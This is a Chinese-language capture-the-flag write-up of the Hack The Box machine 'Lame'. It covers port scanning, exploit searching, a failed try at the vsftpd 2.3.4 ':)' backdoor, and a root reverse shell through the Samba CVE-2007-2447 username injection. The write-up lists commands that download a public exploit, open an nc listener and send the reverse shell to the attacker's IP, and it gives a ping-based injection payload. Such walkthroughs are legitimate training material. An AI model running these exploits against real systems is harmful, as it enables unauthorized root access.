HTB Linux Lame

简介
很简单的一台靶机，考察历史漏洞搜索和利用的能力。搜索之后找到vsftpd 2.3.4，以为是直接利用vsftpd 2.3.4后门漏洞的，结果无法利用然后 找到Samba smbd 3.0.20-Debian中存在的用户名命令注入漏洞，成功拿到root权限的反弹shell。

文章目录

• 信息收集
• 漏洞利用
• 漏洞分析

信息收集

route: 端口扫描 -> 历史漏洞搜索 -> 人工访问搜集信息

端口扫描

# Nmap 7.70 scan initiated Sat Dec  7 17:02:56 2019 as: nmap -sC -sV -p21,22,129,445,3632 -oA nmap/lame-tcp-vul 10.10.10.3
Nmap scan report for localhost (10.10.10.3)
Host is up (0.30s latency).

PORT     STATE    SERVICE     VERSION
21/tcp   open     ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open     ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
129/tcp  filtered pwdgen
445/tcp  open     netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open     distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2d21h56m51s, deviation: 0s, median: -2d21h56m51s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-12-04T01:06:15-05:00
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  7 17:03:46 2019 -- 1 IP address (1 host up) scanned in 50.02 seconds

结果分析：
21端口，ftp服务，版本：vsftpd 2.3.4
22端口，ssh服务，版本：OpenSSH 4.7p1
129端口，pwdgen服务
445端口，netbios-ssn服务，版本：Samba smbd 3.0.20-Debian
3632端口，distccd服务，版本：distccd v1

历史漏洞搜索

通过searchsploit搜索服务版本已爆出的漏洞：

1. vsftpd 2.3.4

$ searchsploit vsftpd 2.3.4
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
 Exploit Title                                                                                                       |  Path
                                                                                                                     | (/usr/local/opt/exploitdb/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                               | exploits/unix/remote/17491.rb
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
Shellcodes: No Result
Papers: No Result

vsftpd 2.3.4版本存在后门，通过在用户名中输入:)即可触发xxxx端口，直接连接即可访问后门。

2. OpenSSH 4.7p1

$  searchsploit openssh 4
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
 Exploit Title                                                                                                       |  Path
                                                                                                                     | (/usr/local/opt/exploitdb/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
Debian OpenSSH - (Authenticated) Remote SELinux Privilege Escalation                                                 | exploits/linux/remote/6094.txt
FreeBSD OpenSSH 3.5p1 - Remote Command Execution                                                                     | exploits/freebsd/remote/17462.txt
Novell Netware 6.5 - OpenSSH Remote Stack Overflow                                                                   | exploits/novell/dos/14866.txt
OpenSSH 2.3 < 7.7 - Username Enumeration                                                                             | exploits/linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                                                       | exploits/linux/remote/45210.py
OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off-by-One                                                                    | exploits/unix/remote/21314.txt
OpenSSH 2.x/3.x - Kerberos 4 TGT/AFS Token Buffer Overflow                                                           | exploits/linux/remote/21402.txt
OpenSSH 4.3 p1 - Duplicated Block Remote Denial of Service                                                           | exploits/multiple/dos/2444.sh
OpenSSH 6.8 < 6.9 - 'PTY' Local Privilege Escalation                                                                 | exploits/linux/local/41173.c
OpenSSH 7.2 - Denial of Service                                                                                      | exploits/linux/dos/40888.py
OpenSSH 7.2p2 - Username Enumeration                                                                                 | exploits/linux/remote/40136.py
OpenSSH < 6.6 SFTP (x64) - Command Execution                                                                         | exploits/linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution                                                                               | exploits/linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation                 | exploits/linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading                                                             | exploits/linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                                                                 | exploits/linux/remote/45939.py
OpenSSH SCP Client - Write Arbitrary Files                                                                           | exploits/multiple/remote/46516.py
OpenSSHd 7.2p2 - Username Enumeration                                                                                | exploits/linux/remote/40113.txt
Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack                                                                 | exploits/multiple/remote/3303.sh
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
Shellcodes: No Result
-------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------
 Paper Title                                                                                                  |  Path
                                                                                                              | (/usr/local/opt/exploitdb/share/exploitdb-papers/)
-------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------
Roaming Through the OpenSSH Client: CVE-2016-0777 and CVE-2016-0778                                           | papers/english/39247-roaming-through-the-openssh-client-cve-2016-0
-------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------
没有找到可以直接利用的漏洞，暂时放弃；

**3. Samba smbd 3.0.20-Debian**
```sh
$ searchsploit Samba 3.0.20
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
 Exploit Title                                                                                                       |  Path
                                                                                                                     | (/usr/local/opt/exploitdb/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                     | exploits/unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                                                | exploits/linux/remote/7701.txt
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
Shellcodes: No Result
Papers: No Result

找到”Username map script”命令注入漏洞，CVE编号CVE-2007-2447；

4. distccd

$ searchsploit distccd
Exploits: No Result
Shellcodes: No Result
Papers: No Result

综上，先从vsftpd 2.3.4后门和CVE-2007-2447开始尝试。

漏洞利用

vsftpd 2.3.4后门

# 触发后门
$ ftp 10.10.10.6
USER: owef:)
PASS: owef

# 连接后门
$ nc 10.10.10.6 6200
# 然后发现6200端口未开放，后门不存在，可能被自行修复或存在拦截策略。

CVE-2007-2447

# 下载exp
$ wget https://raw.githubusercontent.com/amriunix/CVE-2007-2447/master/usermap_script.py -O cve-2007-2447.py

# 开启监听端口
$ nc -lvvp 4444

# 执行exp
$ python cve-2007-2447.py 10.10.10.6 445 10.10.14.39 4444

成功获取反弹shell且为root权限，直接读取flag.

漏洞分析

vsftpd 2.3.4 backdoor

后门触发点源码：

vsf_sysutil_extra()函数源码：

通过后门触发点源码可以看到当连续出现0x3a和0x29时，执行vsf_sysutil_extra函数，该函数创建socket链接监听6200端口，等有客户端连接到6200端口后通过/bin/sh执行用户输入的内容。
通过python查看0x3a和0x29内容：python -c 'print chr(0x3a)'和python -c 'print chr(0x29)'，分别为:和)。

于是在用户名中添加payload “:)”即可触发漏洞，使服务器监听6200端口。
exploit-db payload

CVE-2007-2447

进行smb认证时，如果用户名中存在shell的语句将会被执行，于是构建payload如下：”/=ping -c1 10.10.14.39“，然后在本机通过tcpdump监听icmp流量，如果有流量进入则证明存在漏洞。
payload